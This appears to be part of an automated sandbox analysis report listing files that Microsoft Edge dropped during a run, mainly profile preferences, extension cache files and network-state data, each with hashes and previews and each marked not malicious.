                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF37020.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):524656
                                Entropy (8bit):4.6377872329235307E-4
                                Encrypted:false
                                SSDEEP:3:LsulY+O:LsnP
                                MD5:90062536F5DF13F6BCAEDF567B7DE370
                                SHA1:2CEE71F4DA9E1102317E507A1C91507E75C5FAFB
                                SHA-256:FBD4A18F89202D27C272514B46C056B6F73FD29F674154A1F4754AC9A596DD89
                                SHA-512:D4C106AC98BC3340B91362F5F052C64321F80E86A38439E60CD73E557CB72CB0EC119FEF1F7121DFE3BD7C034119BF89C619C40829F4CB8C4A748D2797E10774
                                Malicious:false
                                Preview:........................................v&M..x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):0.0012471779557650352
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlct:Ls3ct
                                MD5:3C22E8E2F62A6CB0D25440CAB50D3833
                                SHA1:76BFACC42D4983F7658D284F337B02002836613A
                                SHA-256:1084BC3E51819D23E8C65A4470DCCB62D2F08A3D8930A1567EF3DB3200C29D42
                                SHA-512:B47EFC2803198932802CA77B1EF0E68FDC83C4BB3540DA478AFC43129F8AD6DC0831530E7095F22CA6D2025A610A32BA95A8B6F387F64E97F713BF117B331325
                                Malicious:false
                                Preview:.............................................x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):0.0012471779557650352
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6a032d01-aaa0-4e44-ad59-d5a5746053ec.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\74f4a260-b95b-4ff7-810d-f9b67ca02e5e.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\8b42691b-064f-4a06-9180-2d5849aa6503.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):193
                                Entropy (8bit):4.864047146590611
                                Encrypted:false
                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):36864
                                Entropy (8bit):0.555790634850688
                                Encrypted:false
                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF34920.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF34fa8.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b1a256f0-ff48-475a-bed6-4c59d71dce8f.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                Category:dropped
                                Size (bytes):11755
                                Entropy (8bit):5.190465908239046
                                Encrypted:false
                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                Malicious:false
                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\be0ef733-ec07-4cdc-94f1-dd31d61ac453.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c0fbff52-61dd-4b6d-a030-adda744317da.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):30130
                                Entropy (8bit):5.567426444350437
                                Encrypted:false
                                SSDEEP:768:BSHFtmLoLKPSWPgSfrL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaSpnfuirwl9pAtuL:BSHFt8WKPSWPgSfrLu1ja/SpfuHlstA
                                MD5:73013A4A5A78C2533354A63847D8B9E9
                                SHA1:18785C0A8D96C1AF9C337BD7B10D01E8FF82BEAC
                                SHA-256:76BCE785C2D30F1DBA66A00D4CA446AE78343715A27F262448F18E415D9D8FE4
                                SHA-512:41B4E10F3220CEB7F5831B56EF6E4B88312478B0F45E2668AFB6AF799757F8FE7C5AF39EECC19A5424A04CDEA9CD271380706DA4D77E138538E672A0344E7E25
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cfa8a70d-98ce-49aa-bcec-f90b9372a0da.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
